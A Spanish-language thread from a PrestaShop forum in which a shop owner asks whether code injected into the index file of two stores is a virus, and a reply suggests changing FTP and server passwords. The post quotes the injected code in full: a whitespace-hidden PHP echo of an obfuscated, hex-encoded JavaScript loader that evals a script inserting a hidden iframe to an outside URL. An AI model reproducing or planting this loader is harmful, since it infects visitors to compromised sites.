Jump to content

codigo malicioso en index


ajcm84

Recommended Posts

Hola, quisiera preguntaros sí a alguien mas le ha pasado y a que puede deberse, hace unos días se me extropearon 2 tiendas que tengo creadas con prestashop, me daban un error en index y al ver la pagina con dreamweaver ví que tienen el siguiente codigo escrito:

<?
#2d3965#
                                                                                                                                                                                                                                                          if(empty($xhk)) { $xhk = " <script type=\"text/javascript\" language=\"javascript\"> vgxddv=\"s\"+\"p\"+\"l\"+\"i\"+\"t\";xydcn=window;vtpb=document;mftn=\"0\"+\"x\";wottia=(5-3-1);try{++(vtpb.body)}catch(aur){xkr=false;try{}catch(saioo){xkr=21;}if(1){yhh=\"17:5d:6c:65:5a:6b:60:66:65:17:5a:62:68:66:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5a:62:68:66:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:5a:62:68:66:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:6a:6b:69:58:67:58:71:71:58:64:60:24:5b:60:24:5a:66:5a:5a:66:63:5c:25:60:6b:26:4a:6b:69:6c:6b:6b:6c:69:58:56:5d:60:63:5c:6a:26:69:5c:63:58:70:25:67:5f:67:1e:32:4:1:17:5a:62:68:66:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:5a:62:68:66:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:2f:2a:2a:2e:2c:1e:32:4:1:17:5a:62:68:66:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:2f:2a:2a:2e:2c:67:6f:1e:32:4:1:17:5a:62:68:66:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:2f:2a:2a:2e:2c:67:6f:1e:32:4:1:17:5a:62:68:66:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:2f:2a:2a:2e:2c:1e:32:4:1:17:5a:62:68:66:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:2f:2a:2a:2e:2c:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:5a:62:68:66:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:5a:62:68:66:53:1e:17:5a:63:58:6a:6a:34:53:1e:5a:62:68:66:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:5a:62:68:66:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:5a:62:68:66:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:5a:62:68:66:27:30:1f:20:32:4:1:74:4:1:74\"[vgxddv](\":\");}xydcn=yhh;vgkrg=[];for(tmya=22-20-2;-tmya+1442!=0;tmya+=1){hnj=tmya;if((0x19==031))vgkrg+=String.fromCharCode(eval(mftn+xydcn[1*hnj])+0xa-wottia);}rblxed=eval;rblxed(vgkrg)}</script> "; echo $xhk; }
#/2d3965#
?>

 

borré la tienda y la volví a instalar, cargué la base de datos y se arregló pero al dia siguiente a vuelto a salir el mismo codigo en ambas tiendas. quisiera preguntaros sí se trata de un virus.

 

Link to comment
Share on other sites

yo creo que si

pero ¿cambiaste las contraseñas de acceso ftp y del servidor?

si no tendrás que repetir la operación cambiando las claves ya

bueno alguien sabrá mejor que yo

Hola, las he cambiado ahora, he estado leyendo sobre el tema y es posible que accediesen mediante el ftp a las 2 tiendas. Espero que cambiando las claves se solucione. Gracias por la respuesta.

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...